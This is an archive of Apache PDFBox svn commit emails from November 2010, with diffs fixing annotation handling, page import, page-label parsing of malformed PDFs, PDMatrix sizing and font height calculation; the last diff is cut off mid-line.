pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java?rev=1038216&r1=1038215&r2=1038216&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java (original) +++ pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java Tue Nov 23 17:35:34 2010 @@ -16,6 +16,7 @@ */ package org.apache.pdfbox.pdmodel; +import java.io.File; import junit.framework.TestCase; public class TestPDDocumentCatalog extends TestCase { @@ -26,10 +27,9 @@ public class TestPDDocumentCatalog exten * >PDFBOX-90</a> - Support explicit retrieval of page labels. */ public void testPageLabels() throws Exception { - PDDocument doc = PDDocument.load( - TestPDDocumentCatalog.class.getResourceAsStream( - "test_pagelabels.pdf")); + PDDocument doc = null; try { + doc = PDDocument.load("pdfbox/pdfbox/src/test/resources/org/apache/pdfbox/pdmodel/test_pagelabels.pdf"); PDDocumentCatalog cat = doc.getDocumentCatalog(); String[] labels = cat.getPageLabels().getLabelsByPageIndices(); assertEquals(12, labels.length); @@ -46,8 +46,29 @@ public class TestPDDocumentCatalog exten assertEquals("Appendix I", labels[10]); assertEquals("Appendix II", labels[11]); } finally { - doc.close(); + if(doc != null) + doc.close(); } } + /** + * Test case for + * <a href="https://issues.apache.org/jira/browse/PDFBOX-900" + * >PDFBOX-900</a> - Handle malformed PDFs + */ + public void testLabelsOnMalformedPdf() throws Exception { + PDDocument doc = null; + try { + doc = PDDocument.load("pdfbox/pdfbox/src/test/resources/org/apache/pdfbox/pdmodel/page_label.pdf"); + PDDocumentCatalog cat = doc.getDocumentCatalog(); + // getLabelsByPageIndices() should not throw an exception + String[] labels = cat.getPageLabels().getLabelsByPageIndices(); + } catch(Exception e) { + e.printStackTrace(); + fail("Threw exception!"); + } finally { + if(doc != null) + doc.close(); + } + } } Added: pdfbox/trunk/pdfbox/src/test/resources/org/apache/pdfbox/pdmodel/page_label.pdf URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/test/resources/org/apache/pdfbox/pdmodel/page_label.pdf?rev=1038216&view=auto ============================================================================== Binary file - no diff available. Propchange: pdfbox/trunk/pdfbox/src/test/resources/org/apache/pdfbox/pdmodel/page_label.pdf ------------------------------------------------------------------------------ svn:mime-type = application/octet-stream From [email protected] Tue Nov 23 17:51:25 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39904 invoked from network); 23 Nov 2010 17:51:25 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 23 Nov 2010 17:51:25 -0000 Received: (qmail 57860 invoked by uid 500); 23 Nov 2010 17:51:57 -0000 Delivered-To: [email protected] Received: (qmail 57836 invoked by uid 500); 23 Nov 2010 17:51:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57828 invoked by uid 99); 23 Nov 2010 17:51:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Nov 2010 17:51:57 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Nov 2010 17:51:54 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1E89E23889B1; Tue, 23 Nov 2010 17:50:21 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1038227 - in /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation: PDAnnotation.java PDAnnotationMarkup.java Date: Tue, 23 Nov 2010 17:50:21 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: adam Date: Tue Nov 23 17:50:20 2010 New Revision: 1038227 URL: http://svn.apache.org/viewvc?rev=1038227&view=rev Log: PDFBOX-902: ClassCastException caused by unhandled Markup Annotations. Patch contributed by Kevin Jackson Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotation.java pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotation.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotation.java?rev=1038227&r1=1038226&r2=1038227&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotation.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotation.java Tue Nov 23 17:50:20 2010 @@ -138,6 +138,15 @@ public abstract class PDAnnotation imple { annot = new PDAnnotationWidget( annotDic ); } + else if( subtype.equals( PDAnnotationMarkup.SUB_TYPE_FREETEXT ) || + subtype.equals( PDAnnotationMarkup.SUB_TYPE_POLYGON ) || + subtype.equals( PDAnnotationMarkup.SUB_TYPE_POLYLINE ) || + subtype.equals( PDAnnotationMarkup.SUB_TYPE_CARET ) || + subtype.equals( PDAnnotationMarkup.SUB_TYPE_INK ) || + subtype.equals( PDAnnotationMarkup.SUB_TYPE_SOUND )) + { + annot = new PDAnnotationMarkup( annotDic ); + } else { annot = new PDAnnotationUnknown( annotDic ); Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java?rev=1038227&r1=1038226&r2=1038227&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationMarkup.java Tue Nov 23 17:50:20 2010 @@ -26,15 +26,40 @@ import java.io.IOException; import java.util.Calendar; /** - * This class represents the additonal fields of a Markup type Annotation. - * + * This class represents the additonal fields of a Markup type Annotation. See + * section 12.5.6 of ISO32000-1:2008 (starting with page 390) for details on + * annotation types. * * @author Paul King * @version $Revision: 1.1 $ */ -public abstract class PDAnnotationMarkup extends PDAnnotation +public class PDAnnotationMarkup extends PDAnnotation { - + /** + * Constant for a FreeText type of annotation. + */ + public static final String SUB_TYPE_FREETEXT = "FreeText"; + /** + * Constant for an Polygon type of annotation. + */ + public static final String SUB_TYPE_POLYGON = "Polygon"; + /** + * Constant for an PolyLine type of annotation. + */ + public static final String SUB_TYPE_POLYLINE = "PolyLine"; + /** + * Constant for an Caret type of annotation. + */ + public static final String SUB_TYPE_CARET = "Caret"; + /** + * Constant for an Ink type of annotation. + */ + public static final String SUB_TYPE_INK = "Ink"; + /** + * Constant for an Sound type of annotation. + */ + public static final String SUB_TYPE_SOUND = "Sound"; + /* * The various values of the reply type as defined in the PDF 1.7 reference * Table 170 From [email protected] Tue Nov 23 17:58:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43976 invoked from network); 23 Nov 2010 17:58:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 23 Nov 2010 17:58:46 -0000 Received: (qmail 69954 invoked by uid 500); 23 Nov 2010 17:59:18 -0000 Delivered-To: [email protected] Received: (qmail 69935 invoked by uid 500); 23 Nov 2010 17:59:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69928 invoked by uid 99); 23 Nov 2010 17:59:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Nov 2010 17:59:18 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Nov 2010 17:59:15 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 2204F23889B1; Tue, 23 Nov 2010 17:57:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1038232 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java Date: Tue, 23 Nov 2010 17:57:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: adam Date: Tue Nov 23 17:57:42 2010 New Revision: 1038232 URL: http://svn.apache.org/viewvc?rev=1038232&view=rev Log: PDFBOX-889: Empty page causes NPE in importPage Patch contributed by Kevin Jackson Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java?rev=1038232&r1=1038231&r2=1038232&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java Tue Nov 23 17:57:42 2010 @@ -322,16 +322,19 @@ public class PDDocument implements Pagea try { PDStream src = page.getContents(); - PDStream dest = new PDStream( new COSStream( src.getStream(), document.getScratchFile() ) ); - importedPage.setContents( dest ); - os = dest.createOutputStream(); - - byte[] buf = new byte[10240]; - int amountRead = 0; - is = src.createInputStream(); - while((amountRead = is.read(buf,0,10240)) > -1) + if(src != null) { - os.write(buf, 0, amountRead); + PDStream dest = new PDStream( new COSStream( src.getStream(), document.getScratchFile() ) ); + importedPage.setContents( dest ); + os = dest.createOutputStream(); + + byte[] buf = new byte[10240]; + int amountRead = 0; + is = src.createInputStream(); + while((amountRead = is.read(buf,0,10240)) > -1) + { + os.write(buf, 0, amountRead); + } } addPage( importedPage ); } From [email protected] Tue Nov 23 22:10:28 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7794 invoked from network); 23 Nov 2010 22:10:27 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 23 Nov 2010 22:10:27 -0000 Received: (qmail 18238 invoked by uid 500); 23 Nov 2010 22:10:59 -0000 Delivered-To: [email protected] Received: (qmail 18217 invoked by uid 500); 23 Nov 2010 22:10:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18210 invoked by uid 99); 23 Nov 2010 22:10:59 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Nov 2010 22:10:59 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Nov 2010 22:10:56 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 605B2238890D; Tue, 23 Nov 2010 22:09:24 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1038359 - /pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java Date: Tue, 23 Nov 2010 22:09:24 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: adam Date: Tue Nov 23 22:09:23 2010 New Revision: 1038359 URL: http://svn.apache.org/viewvc?rev=1038359&view=rev Log: PDFBOX-900: ArrayIndexOutOfBoundsException with extracting labels from malformed document Fixed code so it can find the test files. Modified: pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java Modified: pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java?rev=1038359&r1=1038358&r2=1038359&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java (original) +++ pdfbox/trunk/pdfbox/src/test/java/org/apache/pdfbox/pdmodel/TestPDDocumentCatalog.java Tue Nov 23 22:09:23 2010 @@ -29,7 +29,7 @@ public class TestPDDocumentCatalog exten public void testPageLabels() throws Exception { PDDocument doc = null; try { - doc = PDDocument.load("pdfbox/pdfbox/src/test/resources/org/apache/pdfbox/pdmodel/test_pagelabels.pdf"); + doc = PDDocument.load(TestPDDocumentCatalog.class.getResourceAsStream("test_pagelabels.pdf")); PDDocumentCatalog cat = doc.getDocumentCatalog(); String[] labels = cat.getPageLabels().getLabelsByPageIndices(); assertEquals(12, labels.length); @@ -59,7 +59,7 @@ public class TestPDDocumentCatalog exten public void testLabelsOnMalformedPdf() throws Exception { PDDocument doc = null; try { - doc = PDDocument.load("pdfbox/pdfbox/src/test/resources/org/apache/pdfbox/pdmodel/page_label.pdf"); + doc = PDDocument.load(TestPDDocumentCatalog.class.getResourceAsStream("page_label.pdf")); PDDocumentCatalog cat = doc.getDocumentCatalog(); // getLabelsByPageIndices() should not throw an exception String[] labels = cat.getPageLabels().getLabelsByPageIndices(); From [email protected] Wed Nov 24 20:13:24 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26069 invoked from network); 24 Nov 2010 20:13:23 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 24 Nov 2010 20:13:23 -0000 Received: (qmail 43998 invoked by uid 500); 24 Nov 2010 20:13:55 -0000 Delivered-To: [email protected] Received: (qmail 43981 invoked by uid 500); 24 Nov 2010 20:13:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43969 invoked by uid 99); 24 Nov 2010 20:13:55 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Nov 2010 20:13:55 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 24 Nov 2010 20:13:55 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 80D75238897D; Wed, 24 Nov 2010 20:12:23 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1038796 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/Splitter.java Date: Wed, 24 Nov 2010 20:12:23 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: lehmi Date: Wed Nov 24 20:12:23 2010 New Revision: 1038796 URL: http://svn.apache.org/viewvc?rev=1038796&view=rev Log: PDFBOX-28: copy only the page resources otherwise the resulting documents are as large as the origin pdf. Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/Splitter.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/Splitter.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/Splitter.java?rev=1038796&r1=1038795&r2=1038796&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/Splitter.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/Splitter.java Wed Nov 24 20:12:23 2010 @@ -46,7 +46,7 @@ public class Splitter protected PDDocument currentDocument = null; private int splitAtPage=1; - private List newDocuments = null; + private List<PDDocument> newDocuments = null; /** * The current page number that we are processing, zero based. @@ -62,9 +62,9 @@ public class Splitter * * @throws IOException If there is an IOError */ - public List split( PDDocument document ) throws IOException + public List<PDDocument> split( PDDocument document ) throws IOException { - newDocuments = new ArrayList(); + newDocuments = new ArrayList<PDDocument>(); pdfDocument = document; List pages = pdfDocument.getDocumentCatalog().getAllPages(); @@ -180,7 +180,8 @@ public class Splitter PDPage imported = currentDocument.importPage( page ); imported.setCropBox( page.findCropBox() ); imported.setMediaBox( page.findMediaBox() ); - imported.setResources( page.findResources() ); + // only the resources of the page will be copied + imported.setResources( page.getResources() ); imported.setRotation( page.findRotation() ); pageNumber++; } From [email protected] Fri Nov 26 22:40:13 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71206 invoked from network); 26 Nov 2010 22:40:13 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 26 Nov 2010 22:40:13 -0000 Received: (qmail 5681 invoked by uid 500); 26 Nov 2010 22:40:13 -0000 Delivered-To: [email protected] Received: (qmail 5654 invoked by uid 500); 26 Nov 2010 22:40:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5647 invoked by uid 99); 26 Nov 2010 22:40:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Nov 2010 22:40:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Nov 2010 22:40:12 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A36F623889FD; Fri, 26 Nov 2010 22:38:40 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1039583 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripper.java Date: Fri, 26 Nov 2010 22:38:40 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: lehmi Date: Fri Nov 26 22:38:40 2010 New Revision: 1039583 URL: http://svn.apache.org/viewvc?rev=1039583&view=rev Log: PDFBOX-521: fixed the order of the static initializers as proposed by Mel Martinez Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripper.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripper.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripper.java?rev=1039583&r1=1039582&r2=1039583&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripper.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripper.java Fri Nov 26 22:38:40 2010 @@ -62,6 +62,9 @@ public class PDFTextStripper extends PDF private static final String thisClassName = PDFTextStripper.class.getSimpleName().toLowerCase(); + private static float DEFAULT_INDENT_THRESHOLD = 2.0f; + private static float DEFAULT_DROP_THRESHOLD = 2.5f; + //enable the ability to set the default indent/drop thresholds //with -D system properties: // pdftextstripper.indent @@ -125,9 +128,6 @@ public class PDFTextStripper extends PDF private boolean sortByPosition = false; private boolean addMoreFormatting = false; - private static float DEFAULT_INDENT_THRESHOLD = 2.0f; - private static float DEFAULT_DROP_THRESHOLD = 2.5f; - private float indentThreshold = DEFAULT_INDENT_THRESHOLD; private float dropThreshold = DEFAULT_DROP_THRESHOLD; From [email protected] Sat Nov 27 19:30:04 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82890 invoked from network); 27 Nov 2010 19:30:04 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 27 Nov 2010 19:30:04 -0000 Received: (qmail 31053 invoked by uid 500); 27 Nov 2010 19:30:04 -0000 Delivered-To: [email protected] Received: (qmail 31030 invoked by uid 500); 27 Nov 2010 19:30:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31023 invoked by uid 99); 27 Nov 2010 19:30:03 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 27 Nov 2010 19:30:03 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 27 Nov 2010 19:30:03 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E9E7923889F7; Sat, 27 Nov 2010 19:28:31 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1039732 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDMatrix.java Date: Sat, 27 Nov 2010 19:28:31 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: lehmi Date: Sat Nov 27 19:28:31 2010 New Revision: 1039732 URL: http://svn.apache.org/viewvc?rev=1039732&view=rev Log: PDFBOX-909: added support for matrices with 6 elements e.g. the font matrix of a type 3 font Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDMatrix.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDMatrix.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDMatrix.java?rev=1039732&r1=1039731&r2=1039732&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDMatrix.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDMatrix.java Sat Nov 27 19:28:31 2010 @@ -30,7 +30,12 @@ import org.apache.pdfbox.cos.COSNumber; public class PDMatrix implements COSObjectable { private COSArray matrix; - + // the number of row elements depends on the number of elements + // within the given matrix + // 3x3 e.g. Matrix of a CalRGB colorspace dictionary + // 3x2 e.g. FontMatrix of a type 3 font + private int numberOfRowElements = 3; + /** * Constructor. */ @@ -55,7 +60,10 @@ public class PDMatrix implements COSObje */ public PDMatrix( COSArray array ) { - matrix = array; + if ( array.size() == 6) + { + numberOfRowElements = 2; + } } /** @@ -89,7 +97,7 @@ public class PDMatrix implements COSObje */ public float getValue( int row, int column ) { - return ((COSNumber)matrix.get( row*3 + column )).floatValue(); + return ((COSNumber)matrix.get( row*numberOfRowElements + column )).floatValue(); } /** @@ -101,6 +109,6 @@ public class PDMatrix implements COSObje */ public void setValue( int row, int column, float value ) { - matrix.set( row*3+column, new COSFloat( value ) ); + matrix.set( row*numberOfRowElements+column, new COSFloat( value ) ); } } From [email protected] Sat Nov 27 19:43:37 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86034 invoked from network); 27 Nov 2010 19:43:37 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 27 Nov 2010 19:43:37 -0000 Received: (qmail 38884 invoked by uid 500); 27 Nov 2010 19:43:37 -0000 Delivered-To: [email protected] Received: (qmail 38866 invoked by uid 500); 27 Nov 2010 19:43:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38859 invoked by uid 99); 27 Nov 2010 19:43:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 27 Nov 2010 19:43:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 27 Nov 2010 19:43:36 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0703423889F7; Sat, 27 Nov 2010 19:42:05 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1039739 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Date: Sat, 27 Nov 2010 19:42:04 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: lehmi Date: Sat Nov 27 19:42:04 2010 New Revision: 1039739 URL: http://svn.apache.org/viewvc?rev=1039739&view=rev Log: PDFBOX-521: fixed calculation of the maxHeight Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java?rev=1039739&r1=1039738&r2=1039739&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Sat Nov 27 19:42:04 2010 @@ -338,6 +338,8 @@ public class PDFStreamEngine // TODO move that to PDFont boolean isType3Font = font instanceof PDType3Font; PDMatrix fontMatrix = font.getFontMatrix(); + float fontMatrixXScaling = fontMatrix.getValue(0, 0); + float fontMatrixYScaling = fontMatrix.getValue(1, 1); //This will typically be 1000 but in the case of a type3 font //this might be a different number @@ -373,6 +375,7 @@ public class PDFStreamEngine float pageHeight = page.findMediaBox().getHeight(); float pageWidth = page.findMediaBox().getWidth(); + Matrix ctm = getGraphicsState().getCurrentTransformationMatrix(); int codeLength = 1; for( int i=0; i<string.length; i+=codeLength) { @@ -387,26 +390,29 @@ public class PDFStreamEngine } // the space width has to be transformed into display units - float spaceWidthDisp = spaceWidthText * fontSizeText * horizontalScalingText * textMatrix.getValue(0, 0) * getGraphicsState().getCurrentTransformationMatrix().getValue(0, 0); + float spaceWidthDisp = spaceWidthText * fontSizeText * horizontalScalingText * textMatrix.getValue(0, 0) * ctm.getValue(0, 0); //todo, handle horizontal displacement // get the width and height of this character in text units float characterHorizontalDisplacementText = font.getFontWidth( string, i, codeLength ); + float characterVerticalDisplacementText = font.getFontHeight( string, i, codeLength ); // Type3 fonts are providing the width of a character in glyph space units if (isType3Font) { - // multiply the witdh with the scaling factor of the font matrix - characterHorizontalDisplacementText = characterHorizontalDisplacementText * fontMatrix.getValue(0, 0); + // multiply the width/height with the scaling factor of the font matrix + characterHorizontalDisplacementText = characterHorizontalDisplacementText * fontMatrixXScaling; + characterVerticalDisplacementText = characterVerticalDisplacementText * fontMatrixYScaling; } - // all other fonts are providing the width of a character in thousandths of a unit of text space + // all other fonts are providing the width/height of a character in thousandths of a unit of text space else { characterHorizontalDisplacementText = characterHorizontalDisplacementText/1000f; + characterVerticalDisplacementText = characterVerticalDisplacementText/1000f; } maxVerticalDisplacementText = Math.max( maxVerticalDisplacementText, - characterHorizontalDisplacementText); + characterVerticalDisplacementText); // PDF Spec - 5.5.2 Word Spacing // @@ -432,7 +438,7 @@ public class PDFStreamEngine spacingText += wordSpacingText; } // Convert textMatrix to display units - Matrix textMatrixStart = textStateParameters.multiply(textMatrix).multiply(getGraphicsState().getCurrentTransformationMatrix()); + Matrix textMatrixStart = textStateParameters.multiply(textMatrix).multiply(ctm); // TODO : tx should be set for horizontal text and ty for 